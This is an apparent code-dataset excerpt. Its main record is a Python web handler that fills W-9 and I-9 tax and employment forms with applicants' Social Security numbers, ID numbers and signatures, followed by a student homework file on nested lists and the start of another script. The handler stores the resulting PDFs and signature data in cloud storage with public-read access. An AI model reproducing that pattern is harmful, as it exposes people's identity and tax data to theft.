dy = str(today.day)\n\n if len(mth) == 1:\n mth = \"0\" + mth\n\n if len(dy) == 1:\n dy = \"0\" + dy\n\n user_date = mth + \"/\" + dy + \"/\" + yr\n\n first_name=self.request.get(\"user_first\")[0].upper() + self.request.get(\"user_first\")[1:]\n last_name=self.request.get(\"user_last\")[0].upper() + self.request.get(\"user_last\")[1:]\n full_name=first_name+' '+last_name\n address_1=self.request.get(\"user_address\")\n address_2=self.request.get(\"user_city\")+' '+self.request.get(\"user_state\")+', '+self.request.get(\"user_postal\")\n city=self.request.get(\"user_city\")\n state=self.request.get(\"user_state\")\n postal_code=self.request.get(\"user_postal\")\n phone=self.request.get(\"user_phone\")\n user_dob=self.request.get(\"user_dob\").replace(\"-\", \"/\")\n 
user_sig=self.request.get(\"user-signature\").replace(\"data:image/png;base64,\", \"\")\n user_status=self.request.get(\"user_status\")\n\n form_office = None\n user_office=self.request.get(\"user_office\")\n office_locations = OfficeLocation.query(OfficeLocation.parent_identifier != \"n/a\")\n for office_location in office_locations:\n if office_location.identifier == user_office:\n form_office = office_location.name\n else:\n form_office = form_office\n\n user_ss=self.request.get(\"user_ss\")\n\n if user_status == \"business\":\n user_ein=self.request.get(\"user_business_ein\")\n\n ss_val = user_ss.replace(\"-\", \"\")\n ein_val = user_ein.replace(\"-\", \"\")\n\n ss_vals = list(ss_val)\n ein_vals = list(ein_val)\n ss_coords_w9 = Helpers.get_ss_coordinates(\"w9\")\n ss_coords_i9 = Helpers.get_ss_coordinates(\"i9\")\n ein_coords_w9 = Helpers.get_ss_coordinates(\"ein\")\n\n ret_list_ss = []\n cnt_ss = 0\n\n for ss_val_list in ss_vals:\n ss_char_info = {}\n ss_char_info[\"ss_char_val\"] = ss_val_list\n ss_char_info[\"w9_coords\"] = ss_coords_w9[cnt_ss]\n ss_char_info[\"i9_coords\"] = ss_coords_i9[cnt_ss]\n ret_list_ss.append(ss_char_info)\n cnt_ss += 1\n\n ret_list_ein = []\n cnt_ein = 0\n\n for ein_val_list in ein_vals:\n ein_char_info = {}\n ein_char_info[\"ein_char_val\"] = ein_val_list\n ein_char_info[\"ein_coords\"] = ein_coords_w9[cnt_ein]\n ret_list_ein.append(ein_char_info)\n cnt_ein += 1\n\n else:\n\n ss_val = user_ss.replace(\"-\", \"\")\n ss_vals = list(ss_val)\n ss_coords_w9 = Helpers.get_ss_coordinates(\"w9\")\n ss_coords_i9 = Helpers.get_ss_coordinates(\"i9\")\n\n ret_list = []\n cnt = 0\n\n for ss_val_list in ss_vals:\n ss_char_info = {}\n ss_char_info[\"ss_char_val\"] = ss_val_list\n ss_char_info[\"w9_coords\"] = ss_coords_w9[cnt]\n ss_char_info[\"i9_coords\"] = ss_coords_i9[cnt]\n ret_list.append(ss_char_info)\n cnt += 1\n\n w9_i9_font_1 = ImageFont.truetype(\"Times.ttf\", 41)\n w9_font_2 = ImageFont.truetype(\"Times.ttf\", 71)\n\n first_name_image 
= Image.new(\"RGBA\", (750,60), (255,255,255))\n draw = ImageDraw.Draw(first_name_image)\n draw.text((5, 0), first_name, (0,0,0), font=w9_i9_font_1)\n\n last_name_image = Image.new(\"RGBA\", (750,60), (255,255,255))\n draw = ImageDraw.Draw(last_name_image)\n draw.text((5, 0), last_name, (0,0,0), font=w9_i9_font_1)\n\n full_name_image = Image.new(\"RGBA\", (2060,45), (255,255,255, 0))\n draw = ImageDraw.Draw(full_name_image)\n draw.text((5, 0), full_name, (0,0,0), font=w9_i9_font_1)\n\n address_1_image = Image.new(\"RGBA\", (1300,45), (255,255,255))\n draw = ImageDraw.Draw(address_1_image)\n draw.text((5, 0), address_1, (0,0,0), font=w9_i9_font_1)\n\n address_2_image = Image.new(\"RGBA\", (1300,45), (255,255,255))\n draw = ImageDraw.Draw(address_2_image)\n draw.text((5, 0), address_2, (0,0,0), font=w9_i9_font_1)\n\n address_street_image = Image.new(\"RGBA\", (870,60), (255,255,255))\n draw = ImageDraw.Draw(address_street_image)\n draw.text((5, 0), address_1, (0,0,0), font=w9_i9_font_1)\n\n address_city_image = Image.new(\"RGBA\", (585,60), (255,255,255))\n draw = ImageDraw.Draw(address_city_image)\n draw.text((5, 0), city, (0,0,0), font=w9_i9_font_1)\n\n address_state_image = Image.new(\"RGBA\", (175,60), (255,255,255))\n draw = ImageDraw.Draw(address_state_image)\n draw.text((5, 0), state, (0,0,0), font=w9_i9_font_1)\n\n address_postal_image = Image.new(\"RGBA\", (340,60), (255,255,255))\n draw = ImageDraw.Draw(address_postal_image)\n draw.text((5, 0), postal_code, (0,0,0), font=w9_i9_font_1)\n\n dob_image = Image.new(\"RGBA\", (420,60), (255,255,255))\n draw = ImageDraw.Draw(dob_image)\n draw.text((5, 0), user_dob, (0,0,0), font=w9_i9_font_1)\n\n email_image = Image.new(\"RGBA\", (890,50), (255,255,255))\n draw = ImageDraw.Draw(email_image)\n draw.text((5, 0), email, (0,0,0), font=w9_i9_font_1)\n\n phone_image = Image.new(\"RGBA\", (460,60), (255,255,255))\n draw = ImageDraw.Draw(phone_image)\n draw.text((5, 0), phone, (0,0,0), font=w9_i9_font_1)\n\n date_w9_image 
= Image.new(\"RGBA\", (500,45), (255,255,255))\n draw = ImageDraw.Draw(date_w9_image)\n draw.text((5, 0), user_date, (0,0,0), font=w9_i9_font_1)\n\n date_i9_image = Image.new(\"RGBA\", (345,60), (255,255,255))\n draw = ImageDraw.Draw(date_i9_image)\n draw.text((5, 0), user_date, (0,0,0), font=w9_i9_font_1)\n\n check_w9_image = Image.new(\"RGBA\", (35,35), (20,20,20))\n draw = ImageDraw.Draw(check_w9_image)\n draw.rectangle((0, 35 ,0, 0), fill=128)\n\n check_i9_image = Image.new(\"RGBA\", (45,45), (20,20,20))\n draw = ImageDraw.Draw(check_i9_image)\n draw.rectangle((0, 45 ,0, 0), fill=128)\n\n passport_text_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(passport_text_image)\n draw.text((5, 0), \"U.S. Passport\", (0, 0, 0), font=w9_i9_font_1)\n\n dl_text_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(dl_text_image)\n draw.text((5, 0), self.request.get(\"dl_state\") + \" Driver's License\", (0, 0, 0), font=w9_i9_font_1)\n\n id_number_image = Image.new(\"RGBA\", (900, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(id_number_image)\n draw.text((5, 0), self.request.get(\"user_identification_number\"), (0, 0, 0), font=w9_i9_font_1)\n\n authority_text = \"\"\n if self.request.get(\"user_identification_type\") == \"passport\":\n authority_text = \"U.S. Department of State\"\n else:\n states_list = [\n {\n \"name\": \"Alabama\",\n \"abbreviation\": \"AL\",\n \"authority\": \"Alabama Dept. of Revenue\"\n },\n {\n \"name\": \"Alaska\",\n \"abbreviation\": \"AK\",\n \"authority\": \"Alaska Div. of Motor Vehicles\"\n },\n {\n \"name\": \"Arizona\",\n \"abbreviation\": \"AZ\",\n \"authority\": \"Dept. of Transportation\"\n },\n {\n \"name\": \"Arkansas\",\n \"abbreviation\": \"AR\",\n \"authority\": \"AR Dept. of Finance & Administration\"\n },\n {\n \"name\": \"California\",\n \"abbreviation\": \"CA\",\n \"authority\": \"Cal. 
Department of Motor Vehicles\"\n },\n {\n \"name\": \"Colorado\",\n \"abbreviation\": \"CO\",\n \"authority\": \"Colorado Dept. of Revenue\"\n },\n {\n \"name\": \"Connecticut\",\n \"abbreviation\": \"CO\",\n \"authority\": \"Conn. Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"Delaware\",\n \"abbreviation\": \"DE\",\n \"authority\": \"Delaware Div. of Motor Vehicles\"\n },\n {\n \"name\": \"Florida\",\n \"abbreviation\": \"FL\",\n \"authority\": \"Dept. of Highway Safety & Motor Vehicles\"\n },\n {\n \"name\": \"Georgia\",\n \"abbreviation\": \"GA\",\n \"authority\": \"Georgia Dept. of Driver Services\"\n },\n {\n \"name\": \"Hawaii\",\n \"abbreviation\": \"HI\",\n \"authority\": \"Hawaii Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"Idaho\",\n \"abbreviation\": \"ID\",\n \"authority\": \"Idaho Transportation Dept.\"\n },\n {\n \"name\": \"Illinois\",\n \"abbreviation\": \"IL\",\n \"authority\": \"IL Secretary of State\"\n },\n {\n \"name\": \"Indiana\",\n \"abbreviation\": \"IN\",\n \"authority\": \"IN Bureau of Motor Vehicles\"\n },\n {\n \"name\": \"Iowa\",\n \"abbreviation\": \"IA\",\n \"authority\": \"Iowa Dept. of Transportation\"\n },\n {\n \"name\": \"Kansas\",\n \"abbreviation\": \"KS\",\n \"authority\": \"Kansas Dept. 
of Revenue\"\n },\n {\n \"name\": \"Kentucky\",\n \"abbreviation\": \"KY\",\n \"authority\": \"KY Transportation Cabinet\"\n },\n {\n \"name\": \"Lousiana\",\n \"abbreviation\": \"LA\",\n \"authority\": \"LA Office of Motor Vehicles\"\n },\n {\n \"name\": \"Maine\",\n \"abbreviation\": \"ME\",\n \"authority\": \"Maine Bureau of Motor Vehicles\"\n },\n {\n \"name\": \"Maryland\",\n \"abbreviation\": \"MD\",\n \"authority\": \"Maryland Motor Vehicles Admin.\"\n },\n {\n \"name\": \"Massachusetts\",\n \"abbreviation\": \"MA\",\n \"authority\": \"Registry of Motor Vehicles\"\n },\n {\n \"name\": \"Michigan\",\n \"abbreviation\": \"MI\",\n \"authority\": \"MI Secretary of State\"\n },\n {\n \"name\": \"Minnestoa\",\n \"abbreviation\": \"MN\",\n \"authority\": \"MN. Dept. of Public Safety\"\n },\n {\n \"name\": \"Mississippi\",\n \"abbreviation\": \"MS\",\n \"authority\": \"MS Dept. of Public Safety\"\n },\n {\n \"name\": \"Missouri\",\n \"abbreviation\": \"MO\",\n \"authority\": \"MO Dept. of Revenue\"\n },\n {\n \"name\": \"Montana\",\n \"abbreviation\": \"MT\",\n \"authority\": \"MT Dept. of Justice\"\n },\n {\n \"name\": \"Nebraska\",\n \"abbreviation\": \"NE\",\n \"authority\": \"NE Dept of Motor Vehicles\"\n },\n {\n \"name\": \"Nevada\",\n \"abbreviation\": \"NV\",\n \"authority\": \"NV Department of Motor Vehicles\"\n },\n {\n \"name\": \"New Hampshire\",\n \"abbreviation\": \"NH\",\n \"authority\": \"NH Dept. of Safety\"\n },\n {\n \"name\": \"New Jersey\",\n \"abbreviation\": \"NJ\",\n \"authority\": \"NJ Motor Vehicle Commission\",\n },\n {\n \"name\": \"New Mexico\",\n \"abbreviation\": \"NM\",\n \"authority\": \"NM Motor Vehicles Division\"\n },\n {\n \"name\": \"New York\",\n \"abbreviation\": \"NY\",\n \"authority\": \"NY Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"North Carolina\",\n \"abbreviation\": \"NC\",\n \"authority\": \"NC Dept. of Transportation\"\n },\n {\n \"name\": \"North Dakota\",\n \"abbreviation\": \"ND\",\n \"authority\": \"ND Dept. 
of Transportation\"\n },\n {\n \"name\": \"Ohio\",\n \"abbreviation\": \"OH\",\n \"authority\": \"OH Bureau of Motor Vehicles\"\n },\n {\n \"name\": \"Oklahoma\",\n \"abbreviation\": \"OK\",\n \"authority\": \"OK Dept. of Public Safety\"\n },\n {\n \"name\": \"Oregon\",\n \"abbreviation\": \"OR\",\n \"authority\": \"OR Dept. of Transportation\"\n },\n {\n \"name\": \"Pennsylvania\",\n \"abbreviation\": \"PA\",\n \"authority\": \"PA Dept. of Transportation\"\n },\n {\n \"name\": \"Rhode Island\",\n \"abbreviation\": \"RI\",\n \"authority\": \"Rhode Island Dept. of Revenue\"\n },\n {\n \"name\": \"South Carolina\",\n \"abbreviation\": \"SC\",\n \"authority\": \"SC Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"South Dakota\",\n \"abbreviation\": \"SD\",\n \"authority\": \"South Dak. Dept. of Public Safety\"\n },\n {\n \"name\": \"Tennessee\",\n \"abbreviation\": \"TN\",\n \"authority\": \"Dept. of Safety & Homeland Security\"\n },\n {\n \"name\": \"Texas\",\n \"abbreviation\": \"TX\",\n \"authority\": \"TX Dept. of Public Safety\"\n },\n {\n \"name\": \"Utah\",\n \"abbreviation\": \"UT\",\n \"authority\": \"Utah Dept. of Public Safety\"\n },\n {\n \"name\": \"Vermont\",\n \"abbreviation\": \"VT\",\n \"authority\": \"VT Agency of Transportation\"\n },\n {\n \"name\": \"Virginia\",\n \"abbreviation\": \"VA\",\n \"authority\": \"VA Dept. of Motor Vehicles\"\n },\n {\n \"name\": \"Washington\",\n \"abbreviation\": \"WA\",\n \"authority\": \"WA Dept. of Licensing\"\n },\n {\n \"name\": \"West Virginia\",\n \"abbreviation\": \"WV\",\n \"authority\": \"WV Dept. of Transportation\"\n },\n {\n \"name\": \"Wisconsin\",\n \"abbreviation\": \"WI\",\n \"authority\": \"WI Dept. of Transportation\"\n },\n {\n \"name\": \"Wyoming\",\n \"abbreviation\": \"WY\",\n \"authority\": \"WY Dept. 
of Transportation\"\n }\n ]\n\n for stayyyte in states_list:\n if stayyyte[\"abbreviation\"] == self.request.get(\"dl_state\").upper():\n authority_text = stayyyte[\"authority\"]\n\n id_authority_image = Image.new(\"RGBA\", (900, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(id_authority_image)\n draw.text((5, 0), authority_text, (0, 0, 0), font=w9_i9_font_1)\n\n expiration_date_image = Image.new(\"RGBA\", (420, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(expiration_date_image)\n draw.text((5, 0), self.request.get(\"identification_expiration\").replace(\"-\", \"/\"), (0, 0, 0), font=w9_i9_font_1)\n\n ss_title_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(ss_title_image)\n draw.text((5, 0), \"Social Security Card\", (0, 0, 0), font=w9_i9_font_1)\n\n ss_num_image = Image.new(\"RGBA\", (750, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(ss_num_image)\n draw.text((5, 0), user_ss, (0, 0, 0), font=w9_i9_font_1)\n\n ss_authority_image = Image.new(\"RGBA\", (900, 60), (255, 255, 255, 0))\n draw = ImageDraw.Draw(ss_authority_image)\n draw.text((5, 0), \"Social Security Administration\", (0, 0, 0), font=w9_i9_font_1)\n\n working_state = self.request.get(\"user_primary_state\")\n\n img_files = Helpers.get_documentation_images(user_type, working_state, [\"agreement_signature\", \"before_signature_images\", \"after_signature_images\"])\n\n w9_bytes = BytesIO(img_files[\"w9\"].read())\n w9_image = Image.open(w9_bytes)\n img_files[\"w9\"].close()\n\n #commenttttt\n #k\n\n i9_bytes = BytesIO(img_files[\"i9\"].read())\n i9_image = Image.open(i9_bytes)\n img_files[\"i9\"].close()\n\n i9_2_bytes = BytesIO(img_files[\"i9_2\"].read())\n i9_image2 = Image.open(i9_2_bytes)\n img_files[\"i9_2\"].close()\n\n #agreement_intro_image = Image.open(BytesIO(img_files[\"before_signature_images\"][0].read()))\n #img_files[\"before_signature_images\"][0].close()\n #agreement_sig_page_image = 
Image.open(BytesIO(img_files[\"agreement_signature\"].read()))\n #img_files[\"agreement_signature\"].close()\n\n bucket_name = os.environ.get('BUCKET_NAME', app_identity.get_default_gcs_bucket_name())\n bucket = '/' + bucket_name\n\n write_retry_params = gcs.RetryParams(backoff_factor=1.1)\n\n filename = bucket + '/TempDocs/' + new_user.identifier + \"_sig.txt\"\n gcs_file = gcs.open(\n filename,\n 'w',\n content_type=\"text/plain\",\n options={'x-goog-meta-foo': 'foo',\n 'x-goog-meta-bar': 'bar',\n 'x-goog-acl': 'public-read'},\n retry_params=write_retry_params\n )\n\n gcs_file.write(str(user_sig))\n gcs_file.close()\n\n bytes_stream = BytesIO(base64.b64decode(user_sig))\n user_sig_image = Image.open(bytes_stream)\n user_sig_image.thumbnail((656,214), Image.ANTIALIAS)\n\n w9_image.paste(full_name_image, (190, 310), full_name_image)\n w9_image.paste(address_1_image, (190, 860), address_1_image)\n w9_image.paste(address_2_image, (190, 970), address_2_image)\n w9_image.paste(date_w9_image, (1770, 2300), date_w9_image)\n w9_image.paste(user_sig_image, (475, 2185), user_sig_image)\n\n if user_status == \"business\":\n user_business=self.request.get(\"user_business\")\n\n user_business_image = Image.new(\"RGBA\", (2060,45), (255,255,255))\n draw = ImageDraw.Draw(user_business_image)\n draw.text((5, 0), user_business, (0,0,0), font=w9_i9_font_1)\n w9_image.paste(user_business_image, (190,420), user_business_image)\n\n for item in ret_list_ein:\n ein_w9_val = item[\"ein_char_val\"]\n w9_ein_image = Image.new(\"RGBA\", (50,85), (255,255,255,0))\n draw = ImageDraw.Draw(w9_ein_image)\n draw.text((5, 0), ein_w9_val, (0,0,0), font=w9_font_2)\n w9_image.paste(w9_ein_image, (item[\"ein_coords\"][\"x\"], item[\"ein_coords\"][\"y\"]), w9_ein_image)\n\n user_business_type=self.request.get(\"user_business_type\")\n\n if user_business_type == \"sole\":\n w9_image.paste(check_w9_image, (166, 550), check_w9_image)\n elif user_business_type == \"ccorp\":\n w9_image.paste(check_w9_image, 
(724, 550), check_w9_image)\n elif user_business_type == \"scorp\":\n w9_image.paste(check_w9_image, (1055, 550), check_w9_image)\n elif user_business_type == \"partner\":\n w9_image.paste(check_w9_image, (1353, 550), check_w9_image)\n elif user_business_type == \"trust\":\n w9_image.paste(check_w9_image, (1682, 550), check_w9_image)\n elif user_business_type == \"llc\":\n w9_image.paste(check_w9_image, (166, 630), check_w9_image)\n\n user_tax_class = self.request.get(\"user_business_tax\")[0].upper()\n\n tax_class_image = Image.new(\"RGBA\", (145,45), (255,255,255))\n draw = ImageDraw.Draw(tax_class_image)\n draw.text((25, 0), user_tax_class, (0,0,0), font=w9_i9_font_1)\n w9_image.paste(tax_class_image, (1755,625), tax_class_image)\n\n else:\n w9_image.paste(check_w9_image, (166, 550), check_w9_image)\n\n for item in ret_list:\n ss_w9_val = item[\"ss_char_val\"]\n w9_ss_image = Image.new(\"RGBA\", (50,85), (255,255,255,0))\n draw = ImageDraw.Draw(w9_ss_image)\n draw.text((5, 0), ss_w9_val, (0,0,0), font=w9_font_2)\n w9_image.paste(w9_ss_image, (item[\"w9_coords\"][\"x\"], item[\"w9_coords\"][\"y\"]), w9_ss_image)\n\n\n i9_image.paste(last_name_image, (65, 700), last_name_image)\n i9_image.paste(first_name_image, (820, 700), first_name_image)\n i9_image.paste(address_street_image, (65, 830), address_street_image)\n i9_image.paste(address_city_image, (1230, 830), address_city_image)\n i9_image.paste(address_state_image, (1845, 830), address_state_image)\n i9_image.paste(address_postal_image, (2045, 830), address_postal_image)\n i9_image.paste(dob_image, (65, 960), dob_image)\n i9_image.paste(email_image, (995, 980), email_image)\n i9_image.paste(phone_image, (1920, 960), phone_image)\n i9_image.paste(check_i9_image, (45, 1260), check_i9_image)\n i9_image.paste(user_sig_image, (445, 2230), user_sig_image)\n i9_image.paste(date_i9_image, (2025, 2314), date_i9_image)\n\n if self.request.get(\"user_identification_type\") == \"passport\":\n 
i9_image2.paste(passport_text_image, (180, 685), passport_text_image)\n i9_image2.paste(id_authority_image, (180, 775), id_authority_image)\n i9_image2.paste(id_number_image, (180, 865), id_number_image)\n i9_image2.paste(expiration_date_image, (180, 955), expiration_date_image)\n else:\n i9_image2.paste(dl_text_image, (930, 685), dl_text_image)\n i9_image2.paste(id_authority_image, (930, 775), id_authority_image)\n i9_image2.paste(id_number_image, (930, 865), id_number_image)\n i9_image2.paste(expiration_date_image, (930, 955), expiration_date_image)\n\n i9_image2.paste(ss_title_image, (1690, 685), ss_title_image)\n i9_image2.paste(ss_authority_image, (1690, 775), ss_authority_image)\n i9_image2.paste(ss_num_image, (1690, 865), ss_num_image)\n\n\n\n if user_status == \"business\":\n for item in ret_list_ss:\n ss_i9_val = item[\"ss_char_val\"]\n i9_ss_image = Image.new(\"RGBA\", (40,60), (255,255,255,0))\n draw = ImageDraw.Draw(i9_ss_image)\n draw.text((5, 0), ss_i9_val, (0,0,0), font=w9_i9_font_1)\n i9_image.paste(i9_ss_image, (item[\"i9_coords\"][\"x\"], item[\"i9_coords\"][\"y\"]), i9_ss_image)\n\n else:\n for item in ret_list:\n ss_i9_val = item[\"ss_char_val\"]\n i9_ss_image = Image.new(\"RGBA\", (40,60), (255,255,255,0))\n draw = ImageDraw.Draw(i9_ss_image)\n draw.text((5, 0), ss_i9_val, (0,0,0), font=w9_i9_font_1)\n i9_image.paste(i9_ss_image, (item[\"i9_coords\"][\"x\"], item[\"i9_coords\"][\"y\"]), i9_ss_image)\n\n #agreement_intro_image.paste(today_image, (700, 506), today_image)\n #agreement_intro_image.paste(full_name_image, (1060, 562), full_name_image)\n\n\n #recruiters = FieldApplicationUser.query(FieldApplicationUser.rep_id == recruiter_rep_id)\n #for recruiter in recruiters:\n #recruiter_name_image = Image.new(\"RGBA\", (900,60), (255,255,255))\n #draw = ImageDraw.Draw(recruiter_name_image)\n #draw.text((5, 0), recruiter.first_name + \" \" + recruiter.last_name, (0,0,0), font=w9_i9_font_1)\n\n #agreement_sig_page_image.paste(recruiter_name_image, 
(1605, 2206), recruiter_name_image)\n\n\n #agreement_sig_page_image.paste(full_name_image, (1605, 2005), full_name_image)\n #agreement_sig_page_image.paste(user_sig_image, (1500, 1775), user_sig_image)\n\n\n buff = StringIO.StringIO()\n w9_image.save(buff, \"PDF\", resolution=100.0, quality=30.0)\n buff.seek(2)\n w9_pdf=PdfFileReader(buff, False)\n\n buff = StringIO.StringIO()\n i9_image.save(buff, \"PDF\", resolution=100.0, quality=30.0)\n buff.seek(2)\n i9_pdf=PdfFileReader(buff, False)\n\n buff = StringIO.StringIO()\n i9_image2.save(buff, \"PDF\", resolution=100.0, quality=30.0)\n buff.seek(2)\n i9_pdf2 = PdfFileReader(buff, False)\n\n #before_sig_pdfs = []\n #for img in img_files[\"before_signature_images\"]:\n #Image.open(BytesIO(img.read())).save(buff, \"PDF\", resolution=100.0)\n #buff.seek(0)\n #before_sig_pdfs.append(PdfFileReader(buff, False))\n #img.close()\n\n #buff.seek(0)\n\n #agreement_intro_image.save(buff, \"PDF\", resolution=100.0)\n #buff.seek(2)\n #agreement_intro_pdf = PdfFileReader(buff, False)\n\n #agreement_sig_page_image.save(buff, \"PDF\", resolution=100.0)\n #buff.seek(2)\n #agreement_sig_page_pdf = PdfFileReader(buff, False)\n\n #after_sig_pdfs = []\n #for img in img_files[\"after_signature_images\"]:\n # Image.open(BytesIO(img.read())).save(buff, \"PDF\", resolution=100.0)\n # buff.seek(0)\n # after_sig_pdfs.append(PdfFileReader(buff, False))\n # img.close()\n\n #buff.seek(2)\n\n output_docs=PdfFileWriter()\n output_docs.addPage(w9_pdf.getPage(0))\n output_docs.addPage(i9_pdf.getPage(0))\n output_docs.addPage(i9_pdf2.getPage(0))\n\n #for before_sig_pdf in before_sig_pdfs:\n #output_docs.addPage(before_sig_pdf.getPage(0))\n\n #output_docs.addPage(agreement_intro_pdf.getPage(0))\n #output_docs.addPage(agreement_sig_page_pdf.getPage(0))\n\n #for after_sig_pdf in after_sig_pdfs:\n #output_docs.addPage(after_sig_pdf.getPage(0))\n\n buff = StringIO.StringIO()\n buff.seek(2)\n output_docs.write(buff)\n #buff.seek(0)\n\n filename = bucket + 
'/TempDocs/' + new_user.identifier + \"_1.pdf\"\n gcs_file = gcs.open(\n filename,\n 'w',\n content_type=\"application/pdf\",\n options={'x-goog-meta-foo': 'foo',\n 'x-goog-meta-bar': 'bar',\n 'x-goog-acl': 'public-read'},\n retry_params=write_retry_params\n )\n\n gcs_file.write(buff.getvalue())\n gcs_file.close()\n\n memcache.set(key=\"allow_registration_for_\" + new_user.identifier, value=\"1\", time=60 * 10)\n new_user_dict = {}\n new_user_dict[\"identifier\"] = new_user.identifier\n\n new_user_dict[\"first_name\"] = new_user.first_name\n new_user_dict[\"last_name\"] = new_user.last_name\n new_user_dict[\"main_office\"] = new_user.main_office\n new_user_dict[\"rep_id\"] = user_rep_id\n new_user_dict[\"rep_email\"] = new_user.rep_email\n new_user_dict[\"rep_phone\"] = new_user.rep_phone\n new_user_dict[\"user_type\"] = new_user.user_type\n new_user_dict[\"password\"] = new_user.password\n new_user_dict[\"payscale_key\"] = new_user.payscale_key\n new_user_dict[\"sales_rabbit_id\"] = new_user.sales_rabbit_id\n new_user_dict[\"current_status\"] = new_user.current_status\n new_user_dict[\"recruiter_rep_id\"] = new_user.recruiter_rep_id\n new_user_dict[\"allowed_offices\"] = new_user.allowed_offices\n new_user_dict[\"automatic_override_designee\"] = new_user.automatic_override_designee\n new_user_dict[\"automatic_override_enabled\"] = new_user.automatic_override_enabled\n new_user_dict[\"automatic_override_amount\"] = new_user.automatic_override_amount\n\n memcache.set(key=\"temp_pending_user_registration_\" + new_user.identifier, value=new_user_dict, time=60 * 10)\n memcache.set(key=\"user_registration_state_for_\" + new_user.identifier, value=working_state, time=60 * 10)\n memcache.set(key=\"user_registration_city_for_\" + new_user.identifier, value=city, time=60 * 10)\n\n w9_bytes.close()\n i9_bytes.close()\n i9_2_bytes.close()\n bytes_stream.close()\n buff.close()\n\n self.redirect(\"continue_registration/1/\" + new_user.identifier)\n return\n\n name = 
new_user.first_name + \" \" + new_user.last_name\n template_vars = {}\n template_vars[\"name\"] = name\n\n Helpers.send_html_email(new_user.rep_email, \"Your Application to New Power\", \"user_signs_up\", template_vars)\n\n\n attachment_data = {}\n attachment_data[\"content_types\"] = [\"application/pdf\"]\n attachment_data[\"filenames\"] = [\"W9_I9_\" + name.replace(\" \", \"_\") + \".pdf\"]\n attachment_data[\"data\"] = [base64.b64encode(buff.getvalue())]\n\n buff.close()\n\n notification_msg1 = \"Dear Administrator,\\n\\nA new user (\" + name + \") has requested access to register with the in-house npfieldapp.appspot.com app. If you would like to approve \" + name + \", please visit the following link (must be signed-in):\\n\\n\"\n notification_msg1 += \"https://\" + self.request.environ[\"SERVER_NAME\"] + \"/approve_user/\" + new_user.identifier\n\n notification_entries = Notification.query(\n ndb.OR\n (\n Notification.action_name == \"User Registers for App (Email)\",\n Notification.action_name == \"User Register for App (SMS)\",\n )\n )\n for notification_entry in notification_entries:\n for item in notification_entry.notification_list:\n if notification_entry.action_name == \"User Registers for App (Email)\":\n Helpers.send_email(item.email_address, \"Approve Access for \" + name, notification_msg1, attachment_data)\n elif notification_entry.action_name == \"user Registers for App (SMS)\":\n Helpers.send_email(item.email_address, \"Found talent!\", \"Talent acquired: \" + name.lower() + \" from \" + city.lower() + \", \" + state.lower() + \"...\" + str(form_office))\n else:\n logging.info(\"Unkown action name\")\n\n new_user.put()\n self.redirect(\"/?just_registered=true\")\n\n","sub_path":"classes/RegistrationHandler_/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":39283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382471689","text":"'''\nAndrew Lucero\nCS 1134 HW 4\nProfessor 
John Iacono\n\nThis assignment featured a number of exercises.\n'''\n\n'''Question 1) \nSuppose I wrote the following code: \n\nA = [ [1, 2] , [3, [[[4], 5]], 6] , 7, 8]\nprint(6 in A)\n\nIt would return False.\n\nWrite a function inSomewhere(X, s) that will \nreturn true if x is somewhere in x, and x is an arbitrarily \nnested list of lists. \n\n\n\n'''\n\ndef in_somewhere(seek, lst):\n for x in lst:\n if x == seek:\n return True\n if isinstance(x, list):\n if in_somewhere(seek, x):\n return True\n return False\n\n'''\nQuestion 2)\nWrite a function unnest that works as follows: \n\nA=[[1,2],[3,[[[4],5]],6],7,8]\nprint(unnest(A))\nprint(A)\n\noutput: \n[1, 2, 3, 4, 5, 6, 7, 8]\n[[1, 2], [3, [[[4], 5]], 6], 7, 8]\n'''\n\n\ndef unnest(lst):\n unnested_lst = []\n for x in lst:\n if isinstance(x, list):\n unnested_lst += unnest(x)\n else:\n unnested_lst.append(x)\n return unnested_lst\n\n'''\nQuestion 3) \nWrite a function that takes a 2d list, and prints it in an \naesthetically pleasing manner. \n\n'''\n\n\ndef print2d(lst):\n print(\"[\")\n for x in lst:\n print(\" \", x)\n print(\"]\")\n\n'''\nQuestion 4) \nWrite a function triangle(n) that functions as follows:\n \nprint2d(triangle(5))\n\noutput: \n[ \n [5]\n [5, 4]\n [5, 4, 3]\n [5, 4, 3, 2]\n [5, 4, 3, 2, 1]\n]\n'''\n\n\ndef triangle(n):\n app = n\n tri_list = [[] for i in range(n)]\n for x in range(n):\n for y in range(app):\n tri_list[y].append(app)\n app -= 1\n tri_list.reverse()\n return tri_list\n\n\n'''\nQuestion 5)\nWrite a function table that takes the form: \n table(f, xrange, yrange)\nIt should take in a function and 2 ranges as the parameter, \nand return a table that contains the result of running the \nfunction on the row/column values. 
\n\n'''\n\n\ndef table(f, xrange, yrange):\n return_table = []\n for x in yrange:\n return_table.append([f(i,x) for i in xrange])\n return return_table\n\n\n'''\nQuestion 6) \nWrite a nest function that takes functions as follows: \nprint(nest(\"dog\"), 3)\n\noutput: \n[[[\"dog\"]]]\n\n'''\n\n\ndef nest(nestee, n):\n nested_list = []\n if n > 1:\n nested_list.append(nest(nestee, n - 1))\n else:\n return [nestee]\n return nested_list\n\n\ndef main():\n A = [[1, 2], [3, [[[4], 5]], 6], 7, 8]\n print(in_somewhere(6, A))\n print(unnest(A))\n print2d([[i] * 5 for i in range(5)])\n print2d(triangle(5))\n print2d(table(pow, [1, 2, 10], range(10, 15)))\n print(nest(\"dog\", 3))\n\nmain()","sub_path":"CS1134_HW4.py","file_name":"CS1134_HW4.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78485213","text":"#!/usr/bin/env python3\nimport github3\nimport sys\nsys.path.append('./lib')\nfrom github3 import GitHubEnterprise\nfrom getpass import getpass, getuser\nimport re\nfrom wordcloud import WordCloud\nfrom 